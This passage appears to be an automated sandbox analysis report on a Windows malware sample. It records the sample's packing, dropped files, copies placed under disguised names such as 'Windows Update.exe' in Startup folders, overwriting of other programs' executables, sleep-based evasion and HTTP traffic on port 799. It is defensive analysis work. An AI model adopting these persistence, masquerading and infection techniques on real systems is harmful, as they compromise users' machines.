Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: LisectAVT_2403002B_366.exe Static file information: File size 1214464 > 1048576
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Unpacked PE file: 1.2.RRqyIX.exe.ae0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\Temp\server.exe Unpacked PE file: 4.2.server.exe.9a0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Unpacked PE file: 15.2.RRqyIX.exe.a30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Unpacked PE file: 21.2.Microsoft Corporation.exe.930000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Unpacked PE file: 22.2.RRqyIX.exe.510000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack
Source: initial sample Static PE information: section where entry point is pointing to: du
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name: du
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name: du
Source: RRqyIX.exe.0.dr Static PE information: section name: .aspack
Source: RRqyIX.exe.0.dr Static PE information: section name: .adata
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: u
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name: du
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: du
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: du
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name: du
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name: du
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name: du
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name: du
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name: du
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name: du
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name: du
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name: du
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name: du
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name: du
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name: du
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006382D8 push ecx; mov dword ptr [esp], eax 0_2_006382D9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062447A push 006244A8h; ret 0_2_006244A0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006244EC push 00624518h; ret 0_2_00624510
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006244B4 push 006244E0h; ret 0_2_006244D8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00624524 push 00624550h; ret 0_2_00624548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0063853C push ecx; mov dword ptr [esp], edx 0_2_00638541
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062C5A8 push 0062C754h; ret 0_2_0062C74C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00624588 push 006245BCh; ret 0_2_006245B4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00622630 push 00622681h; ret 0_2_00622679
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00638764 push ecx; mov dword ptr [esp], edx 0_2_00638769
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062C756 push 0062C7C7h; ret 0_2_0062C7BF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006357D8 push 00635838h; ret 0_2_00635830
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006228EA push 00622918h; ret 0_2_00622910
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006388C4 push ecx; mov dword ptr [esp], edx 0_2_006388C9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062C8DA push 0062C908h; ret 0_2_0062C900
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00638880 push ecx; mov dword ptr [esp], edx 0_2_00638885
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0063688C push 006368D9h; ret 0_2_006368D1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0063496E push 006349EDh; ret 0_2_006349E5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006339C0 push 00633A36h; ret 0_2_00633A2E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006229A8 push 006229D4h; ret 0_2_006229CC
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00633A38 push 00633AE0h; ret 0_2_00633AD8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00633AE2 push 00633B30h; ret 0_2_00633B28
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623AC8 push ecx; mov dword ptr [esp], eax 0_2_00623AC9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00635ABC push ecx; mov dword ptr [esp], ecx 0_2_00635ABF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00634C3C push 00634C68h; ret 0_2_00634C60
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623D72 push 00623DA0h; ret 0_2_00623D98
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00635D2C push ecx; mov dword ptr [esp], ecx 0_2_00635D2E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062BDDC push ecx; mov dword ptr [esp], edx 0_2_0062BDE1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623DAC push 00623DD8h; ret 0_2_00623DD0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623ED4 push 00623F00h; ret 0_2_00623EF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0061EFD8 push eax; ret 0_2_0061F014
Source: LisectAVT_2403002B_366.exe Static PE information: section name: entropy: 7.976487863015766
Source: LisectAVT_2403002B_366.exe Static PE information: section name: .data entropy: 7.970274705878334
Source: LisectAVT_2403002B_366.exe Static PE information: section name: du entropy: 6.934584666735054
Source: server.exe.0.dr Static PE information: section name: entropy: 7.976487863015766
Source: server.exe.0.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: server.exe.0.dr Static PE information: section name: du entropy: 6.934584666735054
Source: RRqyIX.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ entropy: 6.934446577355295
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR entropy: 6.934784069858757
Source: SciTE.exe.1.dr Static PE information: section name: u entropy: 6.933741776560137
Source: Explower.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe0.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe0.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe0.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe1.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe1.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe1.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe2.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe2.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe2.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe3.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe3.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe3.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe4.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe4.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe4.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe5.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe5.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe5.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe6.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe6.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe6.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe7.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe7.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe7.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe8.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe8.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe8.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: system.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: system.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: system.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Notepad.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Notepad.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Notepad.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Documents\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\system.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Local\Temp\server.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Notepad.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Windows\SysWOW64\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Favorites\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Program Files (x86)\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Desktop\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: 3550000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: 4360000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: 3F60000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: DE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: 3D50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server.exe Memory allocated: 3810000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Memory allocated: 33B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Memory allocated: 40A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Memory allocated: 33B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Memory allocated: 2F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Memory allocated: 3D80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Memory allocated: 3220000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Window / User API: threadDelayed 391
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 409
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 3714
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 3709
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 592
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: foregroundWindowGot 414
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: foregroundWindowGot 422
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 6448 Thread sleep count: 391 > 30
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 1280 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224 Thread sleep count: 409 > 30
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244 Thread sleep count: 3714 > 30
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244 Thread sleep time: -3714000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep count: 3709 > 30
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep time: -3709000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796 Thread sleep count: 307 > 30
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796 Thread sleep time: -30700s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224 Thread sleep time: -34000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep count: 592 > 30
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep time: -592000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe TID: 4888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe TID: 1916 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AE1754h 1_2_00AE1718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00A31754h 15_2_00A31718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_00511718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00511754h 22_2_00511718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00AE29E2
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_009E9998 FindFirstFileW, 4_2_009E9998
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_009F9998 FindFirstFileW, 14_2_009F9998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 15_2_00A329E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00979998 FindFirstFileW, 21_2_00979998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_005129E2
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00AE2B8C
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
